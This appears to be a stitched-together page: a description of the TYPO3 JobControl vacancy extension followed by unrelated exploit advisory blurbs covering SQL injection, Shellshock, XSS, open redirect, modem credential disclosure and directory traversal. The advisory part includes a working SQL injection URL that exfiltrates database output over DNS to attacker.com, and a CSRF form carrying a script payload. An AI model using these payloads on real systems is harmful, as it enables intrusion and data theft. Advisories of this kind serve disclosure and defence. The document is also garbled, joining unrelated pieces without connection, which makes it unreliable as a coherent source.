JobControl (dmmjobcontrol) is a TYPO3 extension for showing jobs ('vacancies') on your website. It provides a list and a detail view and the ability to search and apply for jobs. It can even make RSS feeds of your job list. It works with HTML templates, so it's easy to configure how the extension will look on your site. The list can be shown as a 'paginated list', including a page browser. The extension itself is multilingual; at this moment English, Danish, Polish, German, Russian and Dutch are included. The best feature, however, is that multilingual jobs are fully supported too, so you can provide a translation for a job if you have a multilingual site. JobControl uses MM-relation tables for regions, branches, sectors etc. This means that for every new site, you can make a new list of branches to use. They are not hardcoded and don't require any TypoScript to set up. JobControl is very easy to set up, with good default templates that can be styled to your needs using CSS stylesheets. It's also very powerful and flexible, with lots of configuration options for advanced users.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on the DNS exfiltration technique and may be used to demonstrate the vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request for the IP address of the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker): http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29%29%29%29
This exploit discloses the ISP credentials of the Nucom ADSL R5000UNv2 modem. The vulnerable file is guidewan.html, located at http://gateway/telecom_GUI/guidewan.html. The bug is disclosure of the ISP username and password. The exploit is written in Perl and uses the LWP::UserAgent, HTTP::Request and MIME::Base64 modules.
This module sends the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
Bash Specially-crafted Environment Variables Code Injection Vulnerability is a vulnerability in GNU Bash, which allows attackers to execute arbitrary commands by specifying environment variables. This vulnerability was discovered in September 2014 and affects versions of Bash prior to 4.3. It is also known as Shellshock. The exploit is executed by sending a specially crafted HTTP request to a vulnerable server, which contains a malicious command in the User-Agent header. The command is then executed on the server.
This vulnerability is triggered when extra code is added to the end of bash functions stored in environment variables. This can allow an attacker to inject malicious code into the environment, which can then be executed by the vulnerable system.
Using a specially crafted HTTP request, it is possible to exploit a lack of validation of the “item_id[0]” and “item_id[]” input parameters of the cart.php page. Successful exploitation of the vulnerabilities allows an attacker to read sensitive data from the database and, in some cases, to execute administration operations on the database or issue commands to the operating system. Using a specially crafted HTTP request, it is possible to exploit a lack of neutralization in the output of multiple pages that include user-submitted content. Successful exploitation of the vulnerabilities results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user's session through a “Reflected XSS”. Using a specially crafted HTTP request, it is possible to redirect the normal browsing of users to a malicious site by modifying the untrusted URL input in the Referer HTTP header in the index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scams, user credential theft and malware dissemination.
A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.
If a logged-in administrator user clicks the submit button on this form, a JavaScript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using JavaScript.) <form method="POST" action="http://localhost/wp-admin/options-general.php?page=login_widget_afo"> <input type="text" name="custom_style_afo" value="</textarea><script>alert(1)</script>"> <input type="text" name="option" value="login_widget_afo_save_settings"> <input type="submit"> </form>
A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.